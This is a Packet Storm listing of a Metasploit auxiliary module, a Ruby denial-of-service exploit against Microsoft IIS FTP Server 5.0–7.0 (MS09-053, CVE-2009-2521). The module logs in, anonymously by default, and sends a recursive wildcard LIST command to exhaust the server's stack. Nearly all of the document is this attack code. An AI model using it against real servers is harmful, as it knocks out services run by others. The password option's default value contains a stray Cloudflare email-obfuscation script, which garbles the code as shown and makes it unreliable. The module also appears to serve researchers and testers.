Microsoft IIS FTP Server 7.0 Stack Exhaustion

2011-07-03T00:00:00
ID PACKETSTORM:102750
Type packetstorm
Reporter Kingcope
Modified 2011-07-03T00:00:00

Description

                                        
                                            `# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS  
# Date: Jul 03, 2011  
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>  
# Software Link: http://www.microsoft.com/  
# Version: 5.0 - 7.0  
# Tested on: unpatched version of windows xp & 2k3  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::Ftp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',  
'Description' => %q{  
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.  
},  
'Author' => [  
'Nikolaos "Kingcope" Rangos', # Bug Discoverer  
'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module  
],   
'License' => MSF_LICENSE,  
'Version' => '$Revision: 1.0 $',  
'References' =>  
[  
[ 'CVE', '2009-2521'],  
[ 'BID', '36273'],  
[ 'OSVDB', '57753'],  
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],  
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']  
  
],  
'DisclosureDate' => 'Sep 03 2009'))  
  
register_options([  
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),  
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com<script type="text/javascript">  
/* <![CDATA[ */  
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();  
/* ]]> */  
</script>' ])  
])  
end  
  
def run  
  
return unless connect_login  
  
print_status("Sending DoS packets ...")  
  
send_cmd_data(['ls','-R */../'],nil)   
  
disconnect  
  
print_good("Done")  
  
end  
end  
  
`